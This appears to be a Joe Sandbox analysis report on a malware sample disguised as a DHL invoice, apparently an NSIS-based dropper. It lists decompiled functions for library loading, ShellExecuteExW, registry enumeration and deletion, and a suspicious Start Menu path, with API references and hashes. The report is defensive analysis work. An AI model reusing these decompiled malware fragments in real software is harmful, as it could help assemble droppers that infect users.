Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00402032(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2d8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C41(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C41(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E004066CD( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052EC(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40ce08, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403914( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00402032
0x00402032
0x00402037
0x0040203e
0x004020fd
0x0040224b
0x0040224b
0x00402ac5
0x00402ac8
0x00402ad4
0x00402ad4
0x0040204d
0x00402057
0x0040205a
0x0040206a
0x0040206e
0x00402076
0x00402079
0x004020f6
0x00000000
0x004020f6
0x0040207b
0x00402086
0x0040208a
0x004020ca
0x0040208c
0x0040208f
0x00402092
0x004020be
0x00402094
0x00402097
0x004020a0
0x004020a2
0x004020a2
0x004020a0
0x00402092
0x004020d2
0x004020eb
0x004020eb
0x00000000
0x004020d2
0x0040205d
0x00402065
0x00402068
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,0040324F), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 625e2d01befe0dc7e528f44c483af3649fcdedc5513fd11a3b5737dd6ac49bd6
Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
Opcode Fuzzy Hash: 625e2d01befe0dc7e528f44c483af3649fcdedc5513fd11a3b5737dd6ac49bd6
Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401E7D Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401E7D() {
				intOrPtr _t20;
				void* _t39;
				void* _t42;
				void* _t47;

				_t45 = E00402C41(_t39);
				_t20 = E00402C41(0x31);
				_t43 = E00402C41(0x22);
				E00402C41(0x15);
				E00401423(0xffffffec);
				 *(_t47 - 0x80) =  *(_t47 - 0x18);
				 *((intOrPtr*)(_t47 - 0x7c)) =  *((intOrPtr*)(_t47 - 8));
				 *((intOrPtr*)(_t47 - 0x68)) =  *((intOrPtr*)(_t47 - 0x1c));
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t47 - 0x74)) = _t20;
				 *(_t47 - 0x78) =  ~( *_t19) & _t45;
				asm("sbb eax, eax");
				 *(_t47 - 0x6c) = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical\\Mystificerede5\\Montia\\Sbeskummet\\Gtevielsers22";
				 *(_t47 - 0x70) =  ~( *_t21) & _t43;
				if(E004058B0(_t47 - 0x84) == 0) {
					 *((intOrPtr*)(_t47 - 4)) = 1;
				} else {
					if(( *(_t47 - 0x80) & 0x00000040) != 0) {
						E0040670F(_t42,  *((intOrPtr*)(_t47 - 0x4c)));
						_push( *((intOrPtr*)(_t47 - 0x4c)));
						CloseHandle(); // executed
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t47 - 4));
				return 0;
			}

0x00401e85
0x00401e87
0x00401e97
0x00401e99
0x00401ea0
0x00401ea8
0x00401eae
0x00401eb4
0x00401ebd
0x00401ebf
0x00401ec4
0x00401ecd
0x00401ecf
0x00401ed8
0x00401ee9
0x0040288b
0x00401eef
0x00401ef3
0x00401efc
0x00401f01
0x00401f4d
0x00401f4d
0x00401ef3
0x00402ac8
0x00402ad4

APIs

Part of subcall function 004058B0: ShellExecuteExW.SHELL32(?), ref: 004058BF

Part of subcall function 0040670F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406720
Part of subcall function 0040670F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406742

CloseHandle.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22, xrefs: 00401ECF
@, xrefs: 00401EEF

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
String ID: @$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22
API String ID: 165873841-1176899405
Opcode ID: 2570cc26667e637611acaa48e1add71394577d9a4d983a68424372c8f0089d5f
Instruction ID: 57442a40bf98540f3ad7730ff5dae5ce9e04399cc42873fe1dbeedf7ab92c43c
Opcode Fuzzy Hash: 2570cc26667e637611acaa48e1add71394577d9a4d983a68424372c8f0089d5f
Instruction Fuzzy Hash: 93113071E04204DBDB10DFB9CA4968DBBF4AF08314F24453AE955F72D1DBB884419F14

Uniqueness

Uniqueness Score: -1.00%

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024F8(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C81(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C1F(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024f8
0x004024f8
0x004024f8
0x004024fd
0x00402504
0x00402506
0x0040250e
0x00402511
0x00402514
0x0040288b
0x0040251a
0x00402522
0x00402525
0x0040253e
0x00402544
0x00402546
0x00402548
0x00402548
0x00402527
0x0040252b
0x0040252b
0x0040254f
0x00402556
0x00402557
0x00402557
0x00402ac8
0x00402ad4

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 6116a69028ffb47790af9202a89d4f070e519fbad4c3e23a466051ad8026373b
Instruction ID: dbe10bd121f18fb7400192633b841ac97c07c8ee4f05f9a57cf8ea1e595816d4
Opcode Fuzzy Hash: 6116a69028ffb47790af9202a89d4f070e519fbad4c3e23a466051ad8026373b
Instruction Fuzzy Hash: A3018471904204BFEB149F95DE88ABF7ABCEF80348F10403EF505B61D0DAB85E419B69

Uniqueness

Uniqueness Score: -1.00%

Function 03291076 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,00000000,36D89CE8), ref: 03291225

Strings

?r, xrefs: 03291134

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: ?r
API String ID: 823142352-2340261611
Opcode ID: bae19fc3fac0499f4a17388de06661c61f3c79bc480133fe0c68ff7360b01d66
Instruction ID: 929402e67a1eeb73e72ad3713a47e7afa3e38b27f0aed19847fae116a2c8a98b
Opcode Fuzzy Hash: bae19fc3fac0499f4a17388de06661c61f3c79bc480133fe0c68ff7360b01d66
Instruction Fuzzy Hash: C43158327643469FEB249E7989987FB72E6AF65B10F45852EEC8AC7200D371C8C18711

Uniqueness

Uniqueness Score: -1.00%

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402484(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C81(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C41(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E004061CB(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
				return 0;
			}

0x00402484
0x00402484
0x00402489
0x00402490
0x00402492
0x00402499
0x0040249c
0x0040288b
0x004024a2
0x004024a5
0x004024c0
0x004024f0
0x004024f0
0x004024f3
0x004024c2
0x004024c6
0x004024df
0x004024e6
0x004024e9
0x004024c8
0x004024cb
0x004024d6
0x0040254f
0x00000000
0x00000000
0x00000000
0x004024cb
0x004024c6
0x00402556
0x00402557
0x00402557
0x00402ac8
0x00402ad4

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 4876e45a2f9d494e75cb390ab0a3b195938dbdd2a2527fcbbfce264579aed9f6
Instruction ID: d0975296e26d4c0b9efdbcb6ea02913ec0c3a4f45bebf2ca255a38b3541a69e3
Opcode Fuzzy Hash: 4876e45a2f9d494e75cb390ab0a3b195938dbdd2a2527fcbbfce264579aed9f6
Instruction Fuzzy Hash: CF11A731D14205EBDF14DF64CA585AE77B4EF44348F20843FE445B72D0D6B85A41EB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00405C61 Relevance: 3.0, APIs: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405C61(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406284(0x425ef0, _a4);
				_t21 = E00405C04(0x425ef0);
				if(_t21 != 0) {
					E00406518(_t21);
					if(( *0x42a21c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425ef0 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425ef0);
							_push(0x425ef0);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004065C7();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405BA5(0x425ef0);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B59();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405c6d
0x00405c78
0x00405c7c
0x00405c83
0x00405c8f
0x00405c9f
0x00405ca1
0x00405cb9
0x00405cba
0x00405cc1
0x00405cc2
0x00000000
0x00000000
0x00405ca5
0x00405cac
0x00405cb4
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cac
0x00405cc4
0x00405cca
0x00000000
0x00405cd8
0x00405c91
0x00405c97
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c97
0x00405c7e
0x00000000

APIs

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,75F73420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75F73420,00000000), ref: 00405C12
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F

lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,75F73420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75F73420,00000000), ref: 00405CBA
GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,75F73420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75F73420), ref: 00405CCA

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
Instruction ID: 2026245c43f0ab98faeafd35ab7c4279b053bc85bc29d2cdff443752a8830806
Opcode Fuzzy Hash: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
Instruction Fuzzy Hash: 54F0F436109F511AF62233361D09EAF1648CE82328B5A057FF952B26D1CA3C89039CBE

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x4291ec =  *0x4291ec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x4291ec, 0x7530,  *0x4291d4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040238E(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t18 = E00402CFF(_t20, E00402C41(0x22),  *(_t23 - 0x18) >> 1);
					goto L4;
				} else {
					_t10 = E00402C81(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C41(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x0040238e
0x0040238e
0x00402391
0x00402394
0x004023d5
0x00000000
0x00402396
0x00402398
0x0040239d
0x004023a1
0x0040288b
0x0040288b
0x004023a7
0x004023b7
0x004023b9
0x004023d7
0x004023d9
0x00000000
0x004023df
0x004023d9
0x004023a1
0x00402ac8
0x00402ad4

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: e8f7a1d70398eebc2c0adc0d920283f5811e5b884bcda6d037c35be233dd5cc1
Instruction ID: c64e159aaddbf3301d14cafd97046592125c01172a1cc8aad3b5dad300b5ea2c
Opcode Fuzzy Hash: e8f7a1d70398eebc2c0adc0d920283f5811e5b884bcda6d037c35be233dd5cc1
Instruction Fuzzy Hash: 2FF0FC32E041109BE700BBA49B8DABE72A49B44314F25003FFE02F31C1C9F84D41576D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

